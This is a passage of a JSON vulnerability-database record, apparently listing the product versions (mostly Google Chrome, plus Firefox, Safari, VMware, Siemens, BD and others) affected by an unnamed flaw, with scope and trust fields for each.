        "version": "37"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.83"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.816.0"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "1.5"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.124"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.88"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.13"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.393.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.362.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.78"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.14"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.618.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.628.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.56"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.815.0"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "27.0.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.423.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.8"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "62.0.3202.62"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.802.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.12"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.5.17"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "17.0.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.46"
      },
      {
        "model": "prepstain",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.323.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.804.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.77"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.370.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.23"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.22"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.76"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.40"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.203"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.95"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.805.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.789.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.21"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.32"
      },
      {
        "model": "totalys slideprep",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.46"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.24"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "41.0.2272"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.315"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "4.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.55"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.5.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.11"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.9"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.512.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.109"
      },
      {
        "model": "vsphere data protection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "6.0.5"
      },
      {
        "model": "simatic ipc427e",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.901.0"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "3.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1285.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.729.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.33"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.23"
      },
      {
        "model": "chrome os beta",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0.9.130.14"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.102"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.15"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.483.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.467.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.200"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.10"
      },
      {
        "model": "facslink interface",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.25"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "28"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.16"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0.9.128.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.452.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "40.0.2214.111"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1017"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.105"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.748.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.727.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.89"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.302.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.379.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.76"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.82"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.30"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.654.0"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "3.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.72"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.32"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.37"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "3.0.195.25"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "29.0.1547.10"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.80"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.47"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.119"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.39"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.16"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.13"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.57"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.8"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.73"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.334.0"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "2.0.3"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.110"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.35"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.12"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.33"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.862.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.101"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.37"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.303"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "40.0.2214.91"
      },
      {
        "model": "facsjazz",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "enterprise linux server extended update support",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-6.7"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "17.0.4"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.95"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.8"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.458.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.404.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.721.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.26"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "46.0.2490"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.90"
      },
      {
        "model": "sql server for 32-bit systems service pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "201240"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.335.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1030"
      },
      {
        "model": "workstation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "12.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.8"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.132"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.51"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "6.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.336"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.32"
      },
      {
        "model": "vsphere data protection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "6.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.602.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.211"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.16"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1049.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.104"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.72"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.18"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1058.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.79"
      },
      {
        "model": "sql server for x64-based systems service pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "201240"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.415.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.931.0"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.5.10"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.115"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.722.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.60"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.32"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.520.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.35"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1022"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "9.0.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.651.0"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "3.1.1"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "1.5.0.11"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.6.27"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.31"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.0.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.109"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.476.0"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "10.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.38"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.61"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.124"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.44"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "3.0.195.37"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1055.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1670.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.354.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.38"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.222.12"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.33"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.690.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.75"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.42"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.73"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.64"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.570.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.22"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.347.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.13"
      },
      {
        "model": "vsphere integrated containers",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "1.2"
      },
      {
        "model": "sinumerik d sl ncu730.3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "840"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "3.0.195.24"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.47"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.90"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.98"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.44"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.10"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.11"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.344"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "38"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.412.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.44"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "31.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.27"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.634.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.329.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.72"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1085.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.664.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.26"
      },
      {
        "model": "sinumerik d sl ncu730.3b",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "840"
      },
      {
        "model": "lsr ii",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.83"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.596.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.32"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.46"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.103"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.113"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.53"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.47"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.69"
      },
      {
        "model": "unified computing system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "3.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.730.0"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "1.0.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1060.0"
      },
      {
        "model": "pyxis supply roller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.40"
      },
      {
        "model": "facscount",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.610.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.422.0"
      },
      {
        "model": "windows server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "20160"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.48"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "2.0.0.11"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.43"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.24"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.116"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.299.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.31"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1036.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.41"
